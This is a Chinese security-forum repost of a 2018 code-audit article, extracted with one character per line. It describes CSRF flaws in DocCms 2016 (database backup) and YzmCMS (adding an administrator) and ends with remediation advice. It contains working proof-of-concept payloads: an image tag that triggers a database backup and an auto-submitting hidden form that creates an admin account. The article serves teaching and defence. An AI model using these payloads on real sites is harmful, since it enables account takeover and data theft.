论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
代码审计
[854] 2018-04-11_【代码审计】两个简单的CSRF漏洞实例
文档创建者:
s7ckTeam
浏览次数:
10
最后更新:
2025-01-16
代码审计
10 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前在线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2018-04-11_【代码审计】两个简单的CSRF漏洞实例
0
0
0
1
【
代
码
审
计
】
两
个
简
单
的
C
S
R
F
漏
洞
实
例
原
创
B
y
p
a
s
s
B
y
p
a
s
s
2
0
1
8
-
0
4
-
1
1
前
言
前
言
C
S
R
F
(
C
r
o
s
s
-
s
i
t
e
r
e
q
u
e
s
t
f
o
r
g
e
r
y
)
跨
站
请
求
伪
造
,
通
过
伪
装
来
自
受
信
任
用
户
的
请
求
来
利
用
受
信
任
的
网
站
,
这
边
分
享
两
个
漏
洞
代
码
示
例
。
实
例
一
:
利
用
实
例
一
:
利
用
C
S
R
F
备
份
数
据
库
备
份
数
据
库
环
境
搭
建
:
环
境
搭
建
:
D
o
c
C
m
s
官
网
:
h
t
t
p
:
/
/
w
w
w
.
d
o
c
c
m
s
.
c
o
m
程
序
源
码
:
D
o
c
C
m
s
2
0
1
6
下
载
地
址
:
h
t
t
p
s
:
/
/
p
a
n
.
b
a
i
d
u
.
c
o
m
/
s
/
1
p
L
c
l
i
f
L
代
码
分
析
:
代
码
分
析
:
在
d
o
c
c
m
s
a
d
m
i
n
i
c
o
n
t
r
o
l
l
e
r
s
s
y
s
t
e
m
b
a
c
k
.
p
h
p
中
,
e
x
p
o
r
t
函
数
直
接
对
提
交
上
来
的
参
数
t
a
b
l
e
s
/
s
i
z
e
l
i
m
i
t
进
行
处
理
,
导
出
s
q
l
备
份
文
件
,
未
对
访
问
来
源
进
行
有
效
验
证
,
导
致
数
据
库
备
份
模
块
存
在
C
S
R
F
漏
洞
。
漏
洞
利
用
:
漏
洞
利
用
:
1
、
构
造
C
S
R
F
漏
洞
利
用
代
码
,
只
备
份
管
理
员
用
户
表
d
o
c
_
u
s
e
r
:
2
、
在
网
站
首
页
在
线
留
言
提
交
C
S
R
F
漏
洞
利
用
代
码
:
<
H
2
>
C
R
S
F
T
e
s
t
e
r
<
/
H
2
>
<
i
m
g
s
r
c
=
"
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
:
8
0
/
a
d
m
i
n
i
/
i
n
d
e
x
.
p
h
p
?
m
=
s
y
s
t
e
m
&
s
=
b
a
k
u
p
&
a
=
e
x
p
o
r
t
&
t
a
b
l
e
s
[
]
=
d
o
c
_
u
s
e
r
&
s
i
z
e
l
i
m
i
t
=
2
0
4
8
&
d
o
s
u
b
m
i
t
=
开
始
备
份
数
据
"
w
i
d
t
h
=
"
0
"
h
e
i
g
h
t
=
"
0
"
b
o
r
d
e
r
=
"
0
"
/
>
0
2
2
、
在
网
站
首
页
在
线
留
言
提
交
C
S
R
F
漏
洞
利
用
代
码
:
3
、
当
管
理
员
在
后
台
查
看
留
言
信
息
时
,
自
动
备
份
数
据
库
到
/
d
o
c
c
m
s
/
t
e
m
p
/
d
a
t
a
目
录
下
:
实
例
二
:
利
用
实
例
二
:
利
用
C
S
R
F
添
加
管
理
员
添
加
管
理
员
环
境
搭
建
:
环
境
搭
建
:
Y
z
m
C
M
S
官
网
:
h
t
t
p
:
/
/
w
w
w
.
y
z
m
c
m
s
.
c
o
m
程
序
源
码
下
载
:
h
t
t
p
:
/
/
p
a
n
.
b
a
i
d
u
.
c
o
m
/
s
/
1
p
K
A
4
u
9
9
代
码
分
析
:
代
码
分
析
:
漏
洞
文
件
位
置
:
/
a
p
p
l
i
c
a
t
i
o
n
/
a
d
m
i
n
/
c
o
n
t
r
o
l
l
e
r
/
a
d
m
i
n
_
m
a
n
a
g
e
.
c
l
a
s
s
.
p
h
p
第
3
5
-
5
9
行
中
:
这
段
函
数
中
进
行
添
加
管
理
员
操
作
,
只
进
行
管
理
员
身
份
验
证
,
未
对
访
问
来
源
进
行
识
别
,
导
致
程
序
在
实
现
上
存
在
C
S
R
F
漏
洞
。
漏
洞
利
用
:
漏
洞
利
用
:
1
、
构
造
C
S
R
F
漏
洞
利
用
代
码
如
下
:
1
.
<
!
D
O
C
T
Y
P
E
H
T
M
L
P
U
B
L
I
C
"
-
/
/
W
3
C
/
/
D
T
D
H
T
M
L
4
.
0
1
T
r
a
n
s
i
t
i
o
n
a
l
/
/
E
N
"
>
2
.
3
.
<
h
t
m
l
>
4
.
<
h
e
a
d
>
5
.
<
t
i
t
l
e
>
O
W
A
S
P
C
R
S
F
T
e
s
t
e
r
D
e
m
o
n
s
t
r
a
t
i
o
n
<
/
t
i
t
l
e
>
6
.
<
/
h
e
a
d
>
7
.
<
b
o
d
y
o
n
l
o
a
d
=
"
j
a
v
a
s
c
r
i
p
t
:
f
i
r
e
F
o
r
m
s
(
)
"
>
8
.
<
s
c
r
i
p
t
l
a
n
g
u
a
g
e
=
"
J
a
v
a
S
c
r
i
p
t
"
>
9
.
v
a
r
p
a
u
s
e
s
=
n
e
w
A
r
r
a
y
(
"
6
8
"
)
;
1
0
.
1
1
.
f
u
n
c
t
i
o
n
p
a
u
s
e
c
o
m
p
(
m
i
l
l
i
s
)
1
2
.
{
1
3
.
v
a
r
d
a
t
e
=
n
e
w
D
a
t
e
(
)
;
1
4
.
v
a
r
c
u
r
D
a
t
e
=
n
u
l
l
;
1
5
.
1
6
.
d
o
{
c
u
r
D
a
t
e
=
n
e
w
D
a
t
e
(
)
;
}
1
7
.
w
h
i
l
e
(
c
u
r
D
a
t
e
-
d
a
t
e
<
m
i
l
l
i
s
)
;
1
8
.
}
1
9
.
2
0
.
f
u
n
c
t
i
o
n
f
i
r
e
F
o
r
m
s
(
)
2
1
.
{
2
2
.
v
a
r
c
o
u
n
t
=
1
;
2
3
.
v
a
r
i
=
0
;
2
4
.
2
5
.
f
o
r
(
i
=
0
;
i
<
c
o
u
n
t
;
i
+
+
)
2
6
.
{
2
7
.
d
o
c
u
m
e
n
t
.
f
o
r
m
s
[
i
]
.
s
u
b
m
i
t
(
)
;
2
8
.
2
9
.
p
a
u
s
e
c
o
m
p
(
p
a
u
s
e
s
[
i
]
)
;
3
0
.
}
3
1
.
}
3
2
.
3
3
.
<
/
s
c
r
i
p
t
>
3
4
.
<
H
2
>
O
W
A
S
P
C
R
S
F
T
e
s
t
e
r
D
e
m
o
n
s
t
r
a
t
i
o
n
<
/
H
2
>
3
5
.
<
f
o
r
m
m
e
t
h
o
d
=
"
P
O
S
T
"
n
a
m
e
=
"
f
o
r
m
0
"
a
c
t
i
o
n
=
"
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
:
8
0
/
a
d
m
i
n
/
a
d
m
i
n
_
m
a
n
a
g
e
/
a
d
d
.
h
t
m
l
"
>
3
6
.
<
i
n
p
u
t
t
y
p
e
=
"
h
i
d
d
e
n
"
n
a
m
e
=
"
a
d
m
i
n
n
a
m
e
"
v
a
l
u
e
=
"
a
d
m
i
n
"
/
>
3
7
.
<
i
n
p
u
t
t
y
p
e
=
"
h
i
d
d
e
n
"
n
a
m
e
=
"
p
a
s
s
w
o
r
d
"
v
a
l
u
e
=
"
a
b
c
1
2
3
!
"
/
>
3
8
.
<
i
n
p
u
t
t
y
p
e
=
"
h
i
d
d
e
n
"
n
a
m
e
=
"
p
a
s
s
w
o
r
d
2
"
v
a
l
u
e
=
"
a
b
c
1
2
3
!
"
/
>
3
9
.
<
i
n
p
u
t
t
y
p
e
=
"
h
i
d
d
e
n
"
n
a
m
e
=
"
e
m
a
i
l
"
v
a
l
u
e
=
"
"
/
>
4
0
.
<
i
n
p
u
t
t
y
p
e
=
"
h
i
d
d
e
n
"
n
a
m
e
=
"
r
e
a
l
n
a
m
e
"
v
a
l
u
e
=
"
"
/
>
4
1
.
<
i
n
p
u
t
t
y
p
e
=
"
h
i
d
d
e
n
"
n
a
m
e
=
"
r
o
l
e
i
d
"
v
a
l
u
e
=
"
1
"
/
>
4
2
.
<
i
n
p
u
t
t
y
p
e
=
"
h
i
d
d
e
n
"
n
a
m
e
=
"
d
o
s
u
b
m
i
t
"
v
a
l
u
e
=
"
1
"
/
>
4
3
.
<
/
f
o
r
m
>
4
4
.
<
/
b
o
d
y
>
4
5
.
<
/
h
t
m
l
>
2
、
当
管
理
员
浏
览
该
页
面
时
,
自
动
创
建
管
理
员
账
号
a
d
m
i
n
3
、
利
用
a
d
m
i
n
账
号
可
成
功
登
录
后
台
进
行
任
意
操
作
。
0
3
0
4
修
复
建
议
修
复
建
议
在
服
务
端
的
防
御
,
如
验
证
H
T
T
P
R
e
f
e
r
e
r
字
段
、
在
请
求
地
址
中
添
加
t
o
k
e
n
并
验
证
、
在
H
T
T
P
头
中
自
定
义
属
性
并
验
证
。
E
N
D
不
少
C
M
S
缺
少
对
代
码
安
全
的
考
虑
,
C
S
R
F
仍
然
是
一
个
普
遍
存
在
的
安
全
问
题
。
一
些
企
业
网
站
类
型
的
C
M
S
,
利
用
C
S
R
F
备
份
数
据
、
添
加
管
理
员
等
操
作
,
都
是
很
常
见
的
漏
洞
场
景
。
B
y
p
a
s
s
A
b
o
u
t
M
e
一
个
网
络
安
全
爱
好
者
,
对
技
术
有
着
偏
执
狂
一
样
的
追
求
。
致
力
于
分
享
原
创
高
质
量
干
货
,
包
括
但
不
限
于
:
渗
透
测
试
、
W
A
F
绕
过
、
代
码
审
计
、
安
全
运
维
。
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
代码审计